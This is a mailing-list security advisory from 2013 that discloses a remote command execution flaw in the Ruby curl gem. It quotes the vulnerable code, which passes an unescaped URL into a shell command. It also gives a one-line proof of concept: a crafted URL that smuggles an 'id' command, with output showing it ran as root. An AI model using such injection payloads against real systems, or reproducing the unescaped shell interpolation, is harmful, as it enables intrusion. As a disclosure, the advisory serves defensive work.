[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Curl Ruby Gem Remote command execution

To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Curl Ruby Gem Remote command execution
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Tue, 12 Mar 2013 23:07:48 +0000 (GMT)

<html><body><div><h2>Curl Ruby Gem Remote command execution<br>
3/12/2013
<hr>
</h2>
<p><a href="https://github.com/tg0/curl";>https://github.com/tg0/curl</a>
</p>
<p>Specially crafted URLs can result in remote code execution:
</p>
<p>In ./lib/curl.rb the following lines:
</p>
<pre>131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} 
<strong>{ref}  \"</strong>{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)
</pre>
<dl><dt>PoC:</dt></dl>
<p>page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"";)
</p>
<p>larry@underfl0w:/tmp$ cat p<br>
uid=0(root) gid=0(root) groups=0(root)
</p>
<p>Larry W. Cashdollar<br>
@_larry0<br>
<a href="http://vapid.dhs.org";>http://vapid.dhs.org</a>
</p></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] MiniMagic ruby gem remote code execution
Next by Date: [Full-disclosure] [SECURITY] [DSA 2643-1] puppet security update
Previous by thread: [Full-disclosure] MiniMagic ruby gem remote code execution
Next by thread: [Full-disclosure] [SECURITY] [DSA 2643-1] puppet security update
Index(es):
- Date
- Thread